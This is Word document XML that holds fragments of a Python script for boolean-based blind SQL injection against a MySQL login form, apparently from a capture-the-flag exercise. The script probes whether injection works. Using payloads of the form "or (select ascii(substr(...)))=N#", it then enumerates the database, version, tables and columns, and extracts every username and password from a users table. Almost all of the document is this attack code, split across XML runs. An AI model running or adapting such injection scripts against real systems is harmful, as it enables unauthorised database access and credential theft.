    <w:p w14:paraId="5FCDC19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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389837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7D86795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2AEA3FD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77A02CB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print(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF595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517447A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chr(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EEEAE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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() not in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 xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.upper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() not in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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7649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 xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A83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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(), end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3956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not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.isalpha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664771B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 xml:space="preserve"> += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE3AAB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j, end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021911C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16CB332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 xml:space="preserve">'\n' +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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C76BD7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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="425005C1" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F99070" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B26CB9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tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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6A5C39F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s_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F288CB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4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB86C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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F280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21):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FB8A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79AB2E1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 symbol + " or (select length(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 xml:space="preserve">) from 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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714F3C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" where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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) limit " + str(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) + ",1)={0}#".format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D868F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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F9F8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D6CE3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30B0D55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0AF6270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2044140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print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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC049B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"flag.jp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61DA06F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044B199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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50225F9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length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB2A7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s = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1458A0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list(set(chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).lower</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">()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range(32, 127)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27077CC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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549CDF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5B6FF62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71439D3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 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F45A9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spellStart"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> from "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E454C6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"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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where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database() "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039189B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"limit " + str(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) + ",1),{0}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'{1}'#".format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, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D6AC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passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D635B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD6F2F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2433B22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6E45E2C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0A199BA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# print(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1375015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0AC1AF9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cols += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379074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#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j, end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519BC3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print(cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17572A8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s_ += cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060769F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 = cols</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579ECC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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ret.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(', '))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E187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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D7C61B9" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BDB24D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636E015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columns_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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0E378BB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s_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F74B5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5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111FF0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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A709E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7D741C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6A66C7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symbol + " or (select length(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) from 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columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04105E5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" where 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='users' limit " + str(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) + "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{0}#".format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FED1A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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE663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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763FE5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7220F61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758E68B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7353790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print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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458332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"flag.jp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26AF3F0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2C10C90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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDE0B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length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1F8D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s = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D4F4D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list(set(chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).lower</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">()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range(32, 127)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC21C5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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC745C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60CD826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47111E8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 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC40A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spellStart"/>
      <w:proofErr w:type="gram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(select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA632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"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columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where 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='users' "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A80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"limit " + str(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) + ",1),{0}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'{1}'#".format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, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B10A0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passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD9E12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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F09E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074CBFD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266930F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2C87551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# print(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8D88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3FF8A11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cols += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047EF1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#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j, end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABAD4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cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24576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s_ += cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A3B5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 = cols</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -2].split(', ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502B35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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A823A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_ += </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ret[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3] + ', ' + ret[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C4C9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ret_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C2A9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ret_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2D948" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B67660" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE804D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values_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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420E55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length = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02D97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users = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E3DF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757C175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proofErr w:type="gram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!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498C3D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639D06F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1A20E3A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symbol + f" or (select length(username) from users where id={</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>})=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{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}#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC996A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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4F4C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F896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5F56173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04C5960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2B19B72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# print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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495265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38EDC90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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1544F19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10F44F7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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798A75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length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658E07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users_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA90F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[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32, 127)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C37CA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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009221D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0129ACD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36D7BB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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31860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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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(select username "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEED6B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    "from users limit " + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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- 1) + ",1),{0},1))={1}#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B0EC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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46717E8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10C0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1CAE95C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70B4CF8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638A5EE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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66F33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5E8D937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users_ += chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860350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users_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFD2E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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(users_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA643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users_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D4A28C" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6CB0A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 xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1975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66D79F9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proofErr w:type="gram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!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911A25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348ED36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6651F0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symbol + f" or (select length(password) from users where id={</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>})=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{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}#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707EEB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passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5021B8F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2520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11D165A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2936923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2D93FED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# print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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A3E3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2755F9D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DA60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2BB687D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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14856F1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length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E046D9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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE4E8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[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32, 127)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534805E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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17863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5A84221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1A1D158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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D01DA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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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(select password "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E9DA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    "from users limit " + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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- 1) + ",1),{0},1))={1}#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C317E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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017841D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82E84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221548A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25910CD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48A6ED6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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE329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3B1821E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_ += chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D95A3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_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586775E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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwds.append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_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142405E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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45032B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\n%-12s%-12s' % ('username', 'password\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ACDE7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us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w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zip(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">users,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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DEFFB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%-12s%-12s' % (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>us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wd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D055883" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6121809D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4FFDD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do_bool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60CB30F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, symbol = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can_inject_bool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6E23906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his_database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exe_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>func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'database()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6568DE7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version = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exe_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>func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'version()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A997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Success -&gt; ' + 'MySQL' + ' ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>version.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144DA90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Database -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this_database.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025AE3C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get_tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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73E190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get_columns_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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2F66E4BB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1961947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ables = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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4F88FAA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Tables -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504FB0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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1F79B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umns = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_columns_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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418D151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Columns -&gt; ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
